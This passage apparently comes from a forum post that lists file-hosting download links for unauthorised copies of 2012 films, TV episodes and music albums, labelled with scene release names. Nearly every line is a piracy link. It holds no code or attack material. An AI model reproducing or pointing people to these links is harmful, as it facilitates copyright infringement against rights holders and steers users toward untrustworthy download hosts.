2012 DVDRip XviD avi[/B] [CODE]http://turbobit.net/p2gjnembowzd/The.Letter.2012.DVDRip.XviD-FiCO.avi.html[/CODE] [CODE]http://freakshare.com/files/ivkdho5j/The.Letter.2012.DVDRip.XviD-FiCO.avi.html[/CODE] [CODE]http://rapidgator.net/file/47828120/The.Letter.2012.DVDRip.XviD-FiCO.avi.html[/CODE] [B]The Campaign 2012 DVDRiP XviD avi[/B] [CODE]http://turbobit.net/wjg90pzuwxr9/The.Campaign.2012.DVDRiP.XviD.avi.html[/CODE] [CODE]http://rapidgator.net/file/48203691/The.Campaign.2012.DVDRiP.XviD.avi.html[/CODE] [B]The Amazing Spiderman 2012 TS XViD avi[/B] [CODE]http://turbobit.net/rwbgrgbjcq0l/The.Amazing.Spiderman.2012.TS.XViD.AC3.Hive-CM8.avi.html[/CODE] [CODE]http://rapidgator.net/file/48205009/The.Amazing.Spiderman.2012.TS.XViD.AC3.Hive-CM8.avi.html[/CODE] [B]Grassroots avi[/B] [CODE]http://turbobit.net/wva1kcrxhjn1/Grassroots.avi.html[/CODE] [CODE]http://freakshare.com/files/i0rmjm63/Grassroots.avi.avi.html[/CODE] [CODE]http://rapidgator.net/file/48204603/grUnkNOwN.avi.html[/CODE] [B]Axed 2012 DVDRip XviD avi[/B] [CODE]http://turbobit.net/ruzyz1r7cy1q/Axed.2012.DVDRip.XviD.AC3-5.1-AQOS.avi.html[/CODE] [CODE]http://freakshare.com/files/hx5hwiml/Axed.2012.DVDRip.XviD.AC3-5.1-AQOS.avi.html[/CODE] [CODE]http://rapidgator.net/file/48204198/Axed.2012.DVDRip.XviD.AC3-5.1-AQOS.avi.html[/CODE] [CODE]http://uploaded.net/file/2xtphjq2/Axed.2012.DVDRip.XviD.AC3-5.1-AQOS.avi[/CODE] [B]Premium Rush 2012 HDTS XviD avi[/B] [CODE]http://turbobit.net/isauzbv60f90/Premium.Rush.2012.HDTS.AC3.XviD-RESiSTANCE.avi.html[/CODE] [CODE]http://freakshare.com/files/9exdr1f1/Premium.Rush.2012.HDTS.AC3.XviD-RESiSTANCE.avi.html[/CODE] [CODE]http://rapidgator.net/file/48205887/Premium.Rush.2012.HDTS.AC3.XviD-RESiSTANCE.avi.html[/CODE] [B]The Barrens 2012 BDRiP avi[/B] [CODE]http://turbobit.net/t5gokf4bpigu/The.Barrens.2012.BDRiP.AC3-5.1.XviD-AXED.avi.html[/CODE] [CODE]http://freakshare.com/files/1nsizf7e/The.Barrens.2012.BDRiP.AC3-5.1.XviD-AXED.avi.html[/CODE] [CODE]http://rapidgator.net/file/48216458/The.Barrens.2012.BDRiP.AC3-5.1.XviD-AXED.avi.html[/CODE] [B]Chained 2012 HDRip avi[/B] [CODE]http://turbobit.net/0izxw03zbj2z/Chained.2012.L1.HDRip.avi.html[/CODE] [CODE]http://freakshare.com/files/ihlqb3zl/Chained.2012.L1.HDRip.avi.html[/CODE] [CODE]http://rapidgator.net/file/48216868/Chained.2012.L1.HDRip.avi.html[/CODE] [CODE]http://uploaded.net/file/q23pndgg/Chained.2012.L1.HDRip.avi[/CODE] [B]Madagascar 3 Europes Most Wanted 2012 DVDRip XviD avi[/B] [CODE]http://turbobit.net/35h8fz4mvau5/Madagascar.3.Europes.Most.Wanted.2012.DVDRip.XviD-ALLiANCE.avi.html[/CODE] [CODE]http://freakshare.com/files/vvv5fva2/Madagascar.3.Europes.Most.Wanted.2012.DVDRip.XviD-ALLiANCE.avi.html[/CODE] [CODE]http://rapidgator.net/file/48212222/Madagascar.3.Europes.Most.Wanted.2012.DVDRip.XviD-ALLiANCE.avi.html[/CODE] [B]Butter 2012 DVDSCR XviD avi[/B] [CODE]http://turbobit.net/7jayql8etafx/Butter.2012.DVDSCR.XviD-PSEUDO.avi.html[/CODE] [CODE]http://freakshare.com/files/4n5khufu/Butter.2012.DVDSCR.XviD-PSEUDO.avi.html[/CODE] [CODE]http://uploaded.net/file/o4l4szg6/Butter.2012.DVDSCR.XviD-PSEUDO.avi[/CODE] [B]Victim 2012 DVDRiP XviD avi[/B] [CODE]http://turbobit.net/hf7jvadwj0if/Victim.2012.DVDRiP.XviD-PSEUDO.avi.html[/CODE] [B]Deep In The Heart 2012 DVDRIP XVID avi[/B] [CODE]http://turbobit.net/6sjqlv06kern/Deep.In.The.Heart.2012.DVDRIP.XVID.AC3.5.1-26K.avi.html[/CODE] [CODE]http://freakshare.com/files/bjwg9p2z/Deep.In.The.Heart.2012.DVDRIP.XVID.AC3.5.1-26K.avi.html[/CODE] [B]Chernobyl Diaries 2012 REPACK DVDRip XviD avi[/B] [CODE]http://turbobit.net/45r7pjkpry3v/Chernobyl.Diaries.2012.REPACK.DVDRip.XviD-FiCO.avi.html[/CODE] [B]The Courier 2012 BRRip XviD avi[/B] [CODE]http://turbobit.net/9ml98kuj86gq/The.Courier.2012.PLSUBBED.BRRip.XviD-BiDA.avi.html[/CODE] [CODE]http://freakshare.com/files/mt2le5ut/The.Courier.2012.PLSUBBED.BRRip.XviD-BiDA.avi.html[/CODE] [CODE]http://uploaded.net/file/rctut1sl/The.Courier.2012.PLSUBBED.BRRip.XviD-BiDA.avi[/CODE] [B]Bindlestiffs 2012 DVDRip XviD avi[/B] [CODE]http://turbobit.net/2is8unt1gklj/Bindlestiffs.2012.DVDRip.XviD-VoMiT.avi.html[/CODE] [CODE]http://freakshare.com/files/hobv0vmg/Bindlestiffs.2012.DVDRip.XviD-VoMiT.avi.html[/CODE] [CODE]http://uploaded.net/file/n463kim9/Bindlestiffs.2012.DVDRip.XviD-VoMiT.avi[/CODE] [B]Changing The Game 2012 DVDRip XviD avi[/B] [CODE]http://turbobit.net/1n3if4vxj9kr/Changing.The.Game.2012.DVDRip.XviD-VoMiT.avi.html[/CODE] [CODE]http://freakshare.com/files/fp5ewh4z/Changing.The.Game.2012.DVDRip.XviD-VoMiT.avi.html[/CODE] [B]Storage 24 2012 DVDRip x264 mp4[/B] [CODE]http://turbobit.net/bjltev32cm8u/Storage.24.2012.DVDRip.x264.AAC.mp4.html[/CODE] [CODE]http://freakshare.com/files/wffhviwp/Storage.24.2012.DVDRip.x264.AAC.mp4.html[/CODE] [B]Eden 2012 DVDRip Xvid avi[/B] [CODE]http://turbobit.net/hc4tgbpznr98/Eden_2012_DVDRip_Xvid_AC3_Legend-Rg.avi.html[/CODE] [CODE]http://freakshare.com/files/73mgj93o/Eden_2012_DVDRip_Xvid_AC3_Legend-Rg.avi.html[/CODE] [B]Big Top Scooby Doo 2012 DVDRip XviD avi[/B] [CODE]http://freakshare.com/files/9ng0ik6j/Big.Top.Scooby.Doo.2012.DVDRip.XviD-4PlayHD.avi.html[/CODE] [CODE]http://turbobit.net/gwww8qluxzjv/Big.Top.Scooby.Doo.2012.DVDRip.XviD-4PlayHD.avi.html[/CODE] [B]Four Horsemen 2012 DVDRip XviD avi[/B] [CODE]http://turbobit.net/cmuyemodpjwx/Four.Horsemen.2012.DVDRip.XviD.AC3-MAJESTiC.avi.html[/CODE] [CODE]http://freakshare.com/files/1e2mdn4n/Four.Horsemen.2012.DVDRip.XviD.AC3-MAJESTiC.avi.html[/CODE] [CODE]http://uploaded.net/file/gbj6mhlq/Four.Horsemen.2012.DVDRip.XviD.AC3-MAJESTiC.avi[/CODE] [B]Battlefield America 2012 DVDRip XviD avi[/B] [CODE]http://turbobit.net/cav2vq5h1hjp/Battlefield.America.2012.DVDRip.XviD-PTpOWeR.avi.html[/CODE] [CODE]http://freakshare.com/files/xi81zi5g/Battlefield.America.2012.DVDRip.XviD-PTpOWeR.avi.html[/CODE] [CODE]http://uploaded.net/file/a91uvz5i/Battlefield.America.2012.DVDRip.XviD-PTpOWeR.avi[/CODE] [B]Monster High Ghouls Rule 2012 DVDRip XviD avi[/B] [CODE]http://turbobit.net/b9chdwyw400i/Monster.High.Ghouls.Rule.2012.DVDRip.XviD-VoMiT.avi.html[/CODE] [CODE]http://freakshare.com/files/2jzf0ak9/Monster.High.Ghouls.Rule.2012.DVDRip.XviD-VoMiT.avi.html[/CODE] [B]Werewolf The Beast Amon Us 2012 DVDRip XviD avi[/B] [CODE]http://turbobit.net/07bp7fykiub2/Werewolf.The.Beast.Among.Us.2012.DVDRip.XviD-PTpOWeR.avi.html[/CODE] [CODE]http://freakshare.com/files/mh4si6ai/Werewolf.The.Beast.Among.Us.2012.DVDRip.XviD-PTpOWeR.avi.html[/CODE] [CODE]http://uploaded.net/file/r8ohprb5/Werewolf.The.Beast.Among.Us.2012.DVDRip.XviD-PTpOWeR.avi[/CODE] [B]Baring It All 2011 DVDRip XviD avi[/B] [CODE]http://turbobit.net/8jwhfflhuiml/Baring.It.All.2011.DVDRip.XviD-NOSCREENS.avi.html[/CODE] [CODE]http://freakshare.com/files/s4ffhgpn/Baring.It.All.2011.DVDRip.XviD-NOSCREENS.avi.html[/CODE] [CODE]http://uploaded.net/file/fd3h28b1/Baring.It.All.2011.DVDRip.XviD-NOSCREENS.avi[/CODE] [B]Mad Buddies 2012 DVDRip X264 rar[/B] [CODE]http://turbobit.net/28cy7igxpmwq/Mad.Buddies.2012.DVDRip.X264-NoGRP.rar.html[/CODE] [CODE]http://freakshare.com/files/5emlcrn2/Mad.Buddies.2012.DVDRip.X264-NoGRP.rar.html[/CODE] [CODE]http://uploaded.net/file/tn067awv/Mad.Buddies.2012.DVDRip.X264-NoGRP.rar[/CODE] [B]Deer Crossing 2012 DVDRiP x264 mkv[/B] [CODE]http://turbobit.net/gg1tgbq125m4/Deer.Crossing.2012.DVDRiP.x264-NoGRP.mkv.html[/CODE] [CODE]http://freakshare.com/files/zwa2x3c8/Deer.Crossing.2012.DVDRiP.x264-NoGRP.mkv.html[/CODE] [B]We Are Legion 2012 DVDRip x264 mkv[/B] [CODE]http://turbobit.net/0ju5wsp5yhem/We.Are.Legion.2012.DVDRip.x264.mkv.html[/CODE] [CODE]http://freakshare.com/files/xvgs9rt7/We.Are.Legion.2012.DVDRip.x264.mkv.html[/CODE] [CODE]http://uploaded.net/file/k2u69cez/We.Are.Legion.2012.DVDRip.x264.mkv[/CODE] [B]Moving Day 2012 DVDRip XviD avi[/B] [CODE]http://turbobit.net/kahqqykbeyhn/Moving.Day.2012.DVDRip.XviD-PROJECT_X.avi.html[/CODE] [CODE]http://freakshare.com/files/r3qhrrms/Moving.Day.2012.DVDRip.XviD-PROJECT_X.avi.html[/CODE] [B]Terror Of Dracula 2012 DVDRip Xvid avi[/B] [CODE]http://turbobit.net/h7sctpe8dux1/Terror.Of.Dracula.2012.DVDRip.Xvid-UnKnOwN.avi.html[/CODE] [CODE]http://freakshare.com/files/hgr3lewa/Terror.Of.Dracula.2012.DVDRip.Xvid-UnKnOwN.avi.html[/CODE] [CODE]http://uploaded.net/file/nhbh9s0a/Terror.Of.Dracula.2012.DVDRip.Xvid-UnKnOwN.avi[/CODE] [B]Nature Calls 2012 HDRiP XviD avi[/B] [CODE]http://turbobit.net/ae7wfuep499z/Nature.Calls.2012.HDRiP.AC3-2.0.XviD-AXED.avi.html[/CODE] [B]Pusher 2012 HDRiP XviD avi[/B] [CODE]http://turbobit.net/2c75havzv1hm/Pusher.2012.HDRiP.AC3-2.0.XviD-AXED.avi.html[/CODE] [CODE]http://freakshare.com/files/33m5cuo4/Pusher.2012.HDRiP.AC3-2.0.XviD-AXED.avi.html[/CODE] [B]Alphabeat - Express Non Stop iTunes Version[/B] [CODE]http://turbobit.net/rhipjv8qb7o7/Alphabeat-Express_Non-Stop_iTunes_Version.rar.html[/CODE] [CODE]http://freakshare.com/files/xo4dgynl/Alphabeat-Express_Non-Stop_iTunes_Version.rar.html[/CODE] [CODE]http://rapidgator.net/file/48200694/Alphabeat-Express_Non-Stop_iTunes_Version.rar.html[/CODE] [CODE]http://uploaded.net/file/erqimvu4/Alphabeat-Express_Non-Stop_iTunes_Version.rar[/CODE] [B]Faith - RnB Divas 2012[/B] [CODE]http://turbobit.net/mlbpantw8j94/Faith-RnB-Divas..rar.html[/CODE] [CODE]http://freakshare.com/files/lnvvhi3h/Faith-WHOA.rar.html[/CODE] [CODE]http://rapidgator.net/file/48198487/Faith-WHOA.rar.html[/CODE] [CODE]http://uploaded.net/file/7bgbhzsb/Faith-WHOA.rar[/CODE] [B]Dokken - Broken Bones 2012[/B] [CODE]http://turbobit.net/vb0gb1kptjct/Dokken-Broken_Bones-WEB-2012-wAx.rar.html[/CODE] [CODE]http://rapidgator.net/file/48198142/Dokken-Broken_Bones-WEB-2012-wAx.rar.html[/CODE] [B]Tori Amos-Gold Dust (iTunes Deluxe Version) 2012[/B] [CODE]http://turbobit.net/r45jhbs7srgz/Tori_Amos-Gold_Dust_(iTunes_Deluxe_Version)-2012.rar.html[/CODE] [CODE]http://freakshare.com/files/5rn997ya/Tori_Amos-Gold_Dust_-28iTunes_Deluxe_Version-29-2012.rar.html[/CODE] [CODE]http://rapidgator.net/file/48197371/Tori_Amos-Gold_Dust_(iTunes_Deluxe_Version)-2012.rar.html[/CODE] [CODE]http://uploaded.net/file/nzfozdi6/Tori_Amos-Gold_Dust_%28iTunes_Deluxe_Version%29-2012.rar[/CODE] [B]Ellie Goulding - Halcyon 2012[/B] [CODE]http://turbobit.net/mkdeqyp0qzaj/Ellie_Goulding-Halcyon-2012-pLAN9.rar.html[/CODE] [CODE]http://freakshare.com/files/mtol2vwa/Ellie_Goulding-Halcyon-2012-pLAN9.rar.html[/CODE] [CODE]http://rapidgator.net/file/48197091/Ellie_Goulding-Halcyon-2012-pLAN9.rar.html[/CODE] [CODE]http://uploaded.net/file/rffk0u41/Ellie_Goulding-Halcyon-2012-pLAN9.rar[/CODE] [B]Shameless 10x06 hdtv x264[/B] [CODE]http://turbobit.net/6i6idtd8mjo3/Shameless.10x06.hdtv_x264-fov.mp4.html[/CODE] [CODE]http://freakshare.com/files/kd4qnl3c/Shameless.10x06.hdtv_x264-fov.mp4.html[/CODE] [CODE]http://rapidgator.net/file/48182678/shameless.10x06.hdtv_x264-fov.mp4.html[/CODE] [B]Sons of Anarchy S05E04 HDTV XviD-AFG[/B] [CODE]http://turbobit.net/3pspz2bkiuhs/Sons.of.Anarchy.S05E04.HDTV.XviD-AFG.avi.html[/CODE] [CODE]http://rapidgator.net/file/48179699/Sons.of.Anarchy.S05E04.HDTV.XviD-AFG.avi.html[/CODE] [CODE]http://uploaded.net/file/y4ytqrx1/Sons.of.Anarchy.S05E04.HDTV.XviD-AFG.avi[/CODE] [B]How I Met Your Mother S08E02 HDTV XviD[/B] [CODE]http://turbobit.net/e182lot9nak6/How.I.Met.Your.Mother.S08E02.HDTV.XviD-AFG.avi.html[/CODE] [CODE]http://freakshare.com/files/ygjjzigb/How.I.Met.Your.Mother.S08E02.HDTV.XviD-AFG.avi.html[/CODE] [CODE]http://rapidgator.net/file/48179546/How.I.Met.Your.Mother.S08E02.HDTV.XviD-AFG.avi.html[/CODE] [CODE]http://uploaded.net/file/l0srwjv6/How.I.Met.Your.Mother.S08E02.HDTV.XviD-AFG.avi[/CODE] [B]Supernatural 801.hdtv-lol[/B] [CODE]http://turbobit.net/mst0wlbg0gfj/Supernatural.801.hdtv-lol.mp4.html[/CODE] [CODE]http://freakshare.com/files/u59jzagy/supernatural.801.hdtv-lol.mp4.html[/CODE] [CODE]http://rapidgator.net/file/48180277/supernatural.801.hdtv-lol.mp4.html[/CODE] [CODE]http://uploaded.net/file/x4wyn1tx/supernatural.801.hdtv-lol.mp4[/CODE] [B]New Girl S02E03 720p HDTV X264[/B] [CODE]http://turbobit.net/4dc27gezduss/New.Girl.S02E03.720p.HDTV.X264-DIMENSION.mkv.html[/CODE] [CODE]http://freakshare.com/files/s76b7da3/New.Girl.S02E03.720p.HDTV.X264-DIMENSION.mkv.html[/CODE] [CODE]http://rapidgator.net/file/48181004/New.Girl.S02E03.720p.HDTV.X264-DIMENSION.mkv.html[/CODE] [CODE]http://uploaded.net/file/hrvybdr7/New.Girl.S02E03.720p.HDTV.X264-DIMENSION.mkv[/CODE] [B]Dexter S07E01[/B] [CODE]http://turbobit.net/mjseu2uajgbq/Dexter.S07E01.rus.LostFilm_igoryk06.avi.html[/CODE] [CODE]http://rapidgator.net/file/48181311/Dexter.S07E01.rus.LostFilm_igoryk06.avi.html[/CODE] [CODE]http://uploaded.net/file/9pmx4cwx/Dexter.S07E01.rus.LostFilm_igoryk06.avi[/CODE] [B]NCIS S10E02 HDTV XviD-AFG avi[/B] [CODE]http://turbobit.net/kjm4nz8gbxiv/NCIS.S10E02.HDTV.XviD-AFG.avi.html[/CODE] [CODE]http://freakshare.com/files/t0t74xtb/NCIS.S10E02.HDTV.XviD-AFG.avi.html[/CODE] [CODE]http://rapidgator.net/file/48180825/NCIS.S10E02.HDTV.XviD-AFG.avi.html[/CODE] [CODE]http://uploaded.net/file/wvi0r2t8/NCIS.S10E02.HDTV.XviD-AFG.avi[/CODE] [B]Hart of Dixie S02E01 HDTV XviD-AFG[/B] [CODE]http://turbobit.net/9fsc7m6x8ybx/Hart.of.Dixie.S02E01.HDTV.XviD-AFG.avi.html[/CODE] [CODE]http://rapidgator.net/file/48180984/Hart.of.Dixie.S02E01.HDTV.XviD-AFG.avi.html[/CODE] [CODE]http://freakshare.com/files/d85pvxub/Hart.of.Dixie.S02E01.HDTV.XviD-AFG.avi.html[/CODE] [CODE]http://uploaded.net/file/tjw4st64/Hart.of.Dixie.S02E01.HDTV.XviD-AFG.avi[/CODE] [B]Survivor S25E03 HDTV XviD-AFG[/B] [CODE]http://turbobit.net/6ygwkc2rxgwz/Survivor.S25E03.HDTV.XviD-AFG.avi.html[/CODE] [CODE]http://freakshare.com/files/ubx4hl4a/Survivor.S25E03.HDTV.XviD-AFG.avi.html[/CODE] [CODE]http://rapidgator.net/file/48182359/Survivor.S25E03.HDTV.XviD-AFG.avi.html[/CODE] [CODE]http://uploaded.net/file/skn6jo8n/Survivor.S25E03.HDTV.XviD-AFG.avi[/CODE] [B]Anima Practice S01E03 HDTV XviD-AFG[/B] [CODE]http://turbobit.net/5xbb71jrkvhk/Animal.Practice.S01E03.HDTV.XviD-AFG.avi.html[/CODE] [CODE]http://freakshare.com/files/yyjt5xno/Animal.Practice.S01E03.HDTV.XviD-AFG.avi.html[/CODE] [CODE]http://rapidgator.net/file/48182040/Animal.Practice.S01E03.HDTV.XviD-AFG.avi.html[/CODE] [CODE]http://uploaded.net/file/7819m64v/Animal.Practice.S01E03.HDTV.XviD-AFG.avi[/CODE] [B]The Middle S04E03 HDTV XviD-AFG[/B] [CODE]http://turbobit.net/7txf6wyx03u2/The.Middle.S04E03.HDTV.XviD-AFG.avi.html[/CODE] [CODE]http://rapidgator.net/file/48182183/The.Middle.S04E03.HDTV.XviD-AFG.avi.html[/CODE] [CODE]http://freakshare.com/files/bcu1vqv4/The.Middle.S04E03.HDTV.XviD-AFG.avi.html[/CODE] [CODE]http://uploaded.net/file/ojzuryrp/The.Middle.S04E03.HDTV.XviD-AFG.avi[/CODE] [B]The Beach Boys-50 Big Ones iTunes Version-2012[/B] [CODE]http://turbobit.net/74skzmtis0ae/The_Beach_Boys-50_Big_Ones_iTunes_Version-2012.rar.html[/CODE] [CODE]http://rapidgator.net/file/47232642/The_Beach_Boys-50_Big_Ones_iTunes_Version-2012.rar.html[/CODE] [CODE]http://freakshare.com/files/6cr5hcr6/The_Beach_Boys-50_Big_Ones_iTunes_Version-2012.rar.html[/CODE] [CODE]http://uploaded.net/file/t1e4yvai/The_Beach_Boys-50_Big_Ones_iTunes_Version-2012.rar[/CODE] [B]Papa Roach-The Connection 2012[/B] [CODE]http://turbobit.net/qbj6kclflq5o/Papa_Roach-The_Connection-2012-FiH.zip.html[/CODE] [B]Band of Horses-Mirage Rock-iTunes Version-2012[/B] [CODE]http://turbobit.net/ckxfycyg84pm/Band.of.Horses-Mirage.Rock-iTunes.Version-2012.rar.html[/CODE] [CODE]http://freakshare.com/files/fqsmr2fa/Band.of.Horses-Mirage.Rock-iTunes.Version-2012.rar.html[/CODE] [B]Dragonette - Bodyparts iTunes Bonus Track Version[/B] [CODE]http://turbobit.net/5sdtok4sflaa/Dragonette-Bodyparts_iTunes_Bonus_Track_Version.zip.html[/CODE] [CODE]http://rapidgator.net/file/47232896/Dragonette-Bodyparts_iTunes_Bonus_Track_Version.zip.html[/CODE] [CODE]http://freakshare.com/files/cr2nfh7t/Dragonette-Bodyparts_iTunes_Bonus_Track_Version.zip.html[/CODE] [B]Green Day Uno 2012[/B] [CODE]http://turbobit.net/rcegywtdzi1g/Green.Day.Uno.2012.rar.html[/CODE] [CODE]http://uploaded.net/file/c8ai1zp4/Green.Day.Uno.2012.rar[/CODE] [CODE]http://freakshare.com/files/1uoicapg/Green.Day.Uno.2012.rar.html[/CODE] [B]Christina Aguilera - Your Body[/B] [CODE]http://turbobit.net/a3jcxayq07n1/Christina Aguilera - Your Body.mp4.html[/CODE] [CODE]http://freakshare.com/files/eeb3b3ge/Christina-Aguilera---Your-Body.mp4.html[/CODE] http://rapidgator.net/file/47233923/Christina_Aguilera_-_Your_Body.mp4.html[/CODE] [CODE]http://uploaded.net/file/voidwde6/Christina%20Aguilera%20-%20Your%20Body.mp4[/CODE] [B]DMX-Undisputed-iTunes[/B] [CODE]http://turbobit.net/4qnw2j1whl00/DMX-Undisputed-iTunes.rar.html[/CODE] [CODE]http://freakshare.com/files/73yc2xet/DMX-Undisputed-iTunes.rar.html[/CODE] [CODE]http://rapidgator.net/file/47235023/DMX-Undisputed-iTunes.rar.html[/CODE] [CODE]http://uploaded.net/file/k159vvtq/DMX-Undisputed-iTunes.rar[/CODE] [B]MelanieC - Stages - iTunes 2012[/B] [CODE]http://turbobit.net/1yzdkxpyyfzs/MelanieC-Stages-iTunes.rar.html[/CODE] [CODE]http://freakshare.com/files/aufngcet/MelanieC-Stages-iTunes.rar.html[/CODE] [CODE]http://rapidgator.net/file/47235177/MelanieC-Stages-iTunes.rar.html[/CODE] [B]JAY-Z AND KANYE WEST - WATCH THE THRONE[/B] [CODE]http://turbobit.net/315tzieeohjp/JAY-Z_AND_KANYE_WEST_-_WATCH_THE_THRONE.rar.html[/CODE] [CODE]http://freakshare.com/files/b97cfc97/JAY-Z_AND_KANYE_WEST_-_WATCH_THE_THRONE.rar.html[/CODE] [CODE]http://uploaded.net/file/mp3hveuu/Two_Door_Cinema-Beacon_%28iTunes_Deluxe_Verison%29-2012.rar[/CODE] [B]Tamia - Beautiful Surprise iTunes Version - 2012[/B] [CODE]http://turbobit.net/47098ef91ovk/Tamia-Beautiful_Surprise__iTunes_Version_-2012.rar.html[/CODE] [CODE]http://rapidgator.net/file/47239846/Tamia-Beautiful_Surprise__iTunes_Version_-2012.rar.html[/CODE] [CODE]http://freakshare.com/files/zyqdff9t/Tamia-Beautiful_Surprise__iTunes_Version_-2012.rar.html[/CODE] [B]Nickelback - Trying Not to Love You (iTunes Version) 2012[/B] [CODE]http://turbobit.net/1hfehe0v82vd/Nickelback-Trying_Not_to_Love_You_(iTunes_Version)-2012.m4a.html[/CODE] [CODE]http://freakshare.com/files/ukcarvoo/Nickelback-Trying_Not_to_Love_You_-28iTunes_Version-29-2012.m4a.html[/CODE] [CODE]http://rapidgator.net/file/47239800/Nickelback-Trying_Not_to_Love_You_(iTunes_Version)-2012.m4a.html[/CODE] [CODE]http://uploaded.net/file/lu2hpuqj/Nickelback-Trying_Not_to_Love_You_%28iTunes_Version%29-2012.m4a[/CODE] [B]TobyMac-Eye On It 2012[/B] [CODE]http://turbobit.net/1pkkyyv5fo2l/Eye On It .zip.html[/CODE] [CODE]http://freakshare.com/files/qnbvuzn6/Eye-On-It-.zip.html[/CODE] [CODE]http://uploaded.net/file/ne0peue3/Eye%20On%20It%20.zip[/CODE] [CODE]http://rapidgator.net/file/47240553/Eye_On_It_.zip.html[/CODE] [B]Tenth_Avenue_North-The_Struggle_(iTunes_Version)-2012[/B] [CODE]http://turbobit.net/6ma98q2hs1ad/Tenth_Avenue_North-The_Struggle_(iTunes_Version)-2012.zip.html[/CODE] [CODE]http://freakshare.com/files/d6zc1r5m/Tenth_Avenue_North-The_Struggle_-28iTunes_Version-29-2012.zip.html[/CODE] [B]Block Party - Four-iTunes 2012[/B] [CODE]http://turbobit.net/a633p651epxb/Four-iTunes.zip.html[/CODE] [B]Hoobastank - Fight or Flight - 2012[/B] [CODE]http://turbobit.net/btbvc7ophamr/Hoobastank-Fight-or-Flight-WEB-2012-wAx.rar.html[/CODE] [B]Mariah Carey - Triumphant (Get \'Em) ft Rick Ross, Meek Mill[/B] [CODE]http://turbobit.net/5nexgq3flduk/Mariah Carey - Triumphant (Get \'Em) ft. Rick Ross, Meek Mill.mp4.html[/CODE] [CODE]http://freakshare.com/files/hd6n4d6s/Mariah-Carey---Triumphant--28Get--27Em-29-ft.-Rick-Ross-2C-Meek-Mill.mp4.html[/CODE] [CODE]http://rapidgator.net/file/47242443/Mariah_Carey_-_Triumphant_(Get_\'Em)_ft._Rick_Ross.html[/CODE] [B]Yellowcard-Southern Air (iTunes Version) 2012[/B] [CODE]http://turbobit.net/px3numo062mm/Yellowcard-Southern_Air_(iTunes_Version)-2012.zip.html[/CODE] [CODE]http://freakshare.com/files/z4vb68rc/Yellowcard-Southern_Air_-28iTunes_Version-29-2012.zip.html[/CODE] [CODE]http://uploaded.net/file/39qd84xv/Yellowcard-Southern_Air_%28iTunes_Version%29-2012.zip[/CODE] [CODE]http://rapidgator.net/file/47245018/Yellowcard-Southern_Air_(iTunes_Version)-2012.zip.html[/CODE] [B]John Mayer-The Complete 2012 Performances Collection (EP) (iTunes Version) 2012[/B] [CODE]http://turbobit.net/3128t48pgavt/John_Mayer-The_Complete_2012_Performances_Collection_(EP)_(iTunes_Version)-2012.zip.html[/CODE] [CODE]http://freakshare.com/files/b7y3y4cr/John_Mayer-The_Complete_2012_Performances_Collection_-28EP-29_-28iTunes_Version-29-2012.zip.html[/CODE] [CODE]http://rapidgator.net/file/47245580/John_Mayer-The_Complete_2012_Performances_Collection_(EP)_(iTunes_Version)-2012.zip.html[/CODE] [CODE]http://uploaded.net/file/byl3s0ch/John_Mayer-The_Complete_2012_Performances_Collection_%28EP%29_%28iTunes_Version%29-2012.zip[/CODE] [B]The Beatles - Tomorrow Never Knows (iTunes Version) 2012[/B] [CODE]http://turbobit.net/dl435sew9lcb/The_Beatles-Tomorrow_Never_Knows_(iTunes_Version)-2012.zip.html[/CODE] [CODE]http://freakshare.com/files/venajh71/The_Beatles-Tomorrow_Never_Knows_-28iTunes_Version-29-2012.zip.html[/CODE] [CODE]http://uploaded.net/file/d31txoy5/The_Beatles-Tomorrow_Never_Knows_%28iTunes_Version%29-2012.zip[/CODE] [B]Joss Stone - The Soul S Vol2 2012[/B] [CODE]http://turbobit.net/54uazpf2ssff/JS_The_Soul_S_Vol2_2012.rar.html[/CODE] [CODE]http://freakshare.com/files/x2f5apfn/JS_The_Soul_S_Vol2_2012.rar.html[/CODE] [CODE]http://rapidgator.net/file/47247469/JS_The_Soul_S_Vol2_2012.rar.html[/CODE] [CODE]http://uploaded.net/file/7129p7mq/JS_The_Soul_S_Vol2_2012.rar[/CODE] [B]Three Days Grace-Transit Of Venus 2012[/B] [CODE]http://turbobit.net/a49pdze1vytm/Three_Days_Grace-Transit_Of_Venus-2012-C4.rar.html[/CODE] [CODE]http://freakshare.com/files/9u99m6bg/Three_Days_Grace-Transit_Of_Venus-2012-C4.rar.html[/CODE] [CODE]http://rapidgator.net/file/47248456/Three_Days_Grace-Transit_Of_Venus-2012-C4.rar.html[/CODE] [CODE]http://uploaded.net/file/l2i95o7x/Three_Days_Grace-Transit_Of_Venus-2012-C4.rar[/CODE] [B]The Sex Pistols-Anarchy In The UK - 2001[/B] [CODE]http://turbobit.net/rq7qz1y72eib/The_Sex_Pistols-Anarchy_In_The_UK-CD-FLAC-2001-DeVOiD.rar.html[/CODE] [CODE]http://rapidgator.net/file/47256563/fileflac.com_The_Sex_Pistols-Anarchy_In_The_UK-CD-FLAC-2001-DeVOiD.rar.html[/CODE] [CODE]http://uploaded.net/file/viy4e95e/fileflac.com_The_Sex_Pistols-Anarchy_In_The_UK-CD-FLAC-2001-DeVOiD.rar[/CODE] [B]OST World of Warcraft Mists of Pandaria - 2012[/B] [CODE]http://turbobit.net/5uz88xg2t5mr/OST-World_of_Warcraft-Mists_of_Pandaria-CD-2012-KOPiE.rar.html[/CODE] [CODE]http://freakshare.com/files/5kt6gu4o/OST-World_of_Warcraft-Mists_of_Pandaria-CD-2012-KOPiE.rar.html[/CODE] [CODE]http://rapidgator.net/file/47257079/OST-World_of_Warcraft-Mists_of_Pandaria-CD-2012-KOPiE.rar.html[/CODE] [CODE]http://uploaded.net/file/mqe5aagz/OST-World_of_Warcraft-Mists_of_Pandaria-CD-2012-KOPiE.rar[/CODE] [B]Weezer - Pinkerton 1997[/B] [CODE]http://turbobit.net/7h3n5zryhv60/Weezer_-_Pinkerton.rar.html[/CODE] [CODE]http://freakshare.com/files/zkpay021/Weezer_-_Pinkerton.rar.html[/CODE] [CODE]http://rapidgator.net/file/47258124/Weezer_-_Pinkerton.rar.html[/CODE] [B]Sonata Arctica - Stones Grow Her Name (2012)[/B] [CODE]http://turbobit.net/6ilwoe2e6a61/Sonata Arctica - Stones Grow Her Name (2012).rar.html[/CODE] [CODE]http://freakshare.com/files/slszikqe/Sonata-Arctica---Stones-Grow-Her-Name--282012-29.rar.html[/CODE] [B]The Smashing Pumpkins - Oceania (2012)[/B] [CODE]http://turbobit.net/hgwduex20zit/The_Smashing_Pumpkins_-_Oceania_(2012).rar.html[/CODE] [CODE]http://freakshare.com/files/k5ynbbag/The_Smashing_Pumpkins_-_Oceania_-282012-29.rar.html[/CODE] [B]Rob Zombie 2012[/B] 